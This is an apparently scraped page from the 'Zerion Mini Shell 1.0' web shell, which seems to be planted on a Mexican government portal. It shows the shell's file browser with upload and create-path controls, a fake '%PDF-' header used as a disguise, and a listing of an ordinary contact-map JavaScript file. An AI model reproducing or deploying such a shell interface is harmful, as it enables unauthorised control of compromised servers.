%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/portal.tjamich.gob.mx/adminit2018/assets/js/pages/
Upload File :
Create Path :
Current File : /home/tjamichg/portal.tjamich.gob.mx/adminit2018/assets/js/pages/base_pages_contact.js

/*
 *  Document   : base_pages_contact.js
 *  Author     : pixelcave
 *  Description: Custom JS code used in Contact Page
 */

var BasePagesContact = function() {
    // Init Contact Map with Gmaps.js, for more examples you can check out https://hpneo.github.io/gmaps/
    var initContactMap = function(){
        new GMaps({
            div: '#js-map-contact',
            lat: 37.75755,
            lng: -122.43688,
            zoom: 15,
            disableDefaultUI: true,
            scrollwheel: false
        }).addMarkers([
            {lat: 37.75755, lng: -122.43688, title: 'Marker #1', animation: google.maps.Animation.DROP, infoWindow: {content: '<strong>Company</strong>'}}
        ]);
    };

    return {
        init: function () {
            // Init Contact Map
            initContactMap();
        }
    };
}();

// Initialize when page loads
jQuery(function(){ BasePagesContact.init(); });

Zerion Mini Shell 1.0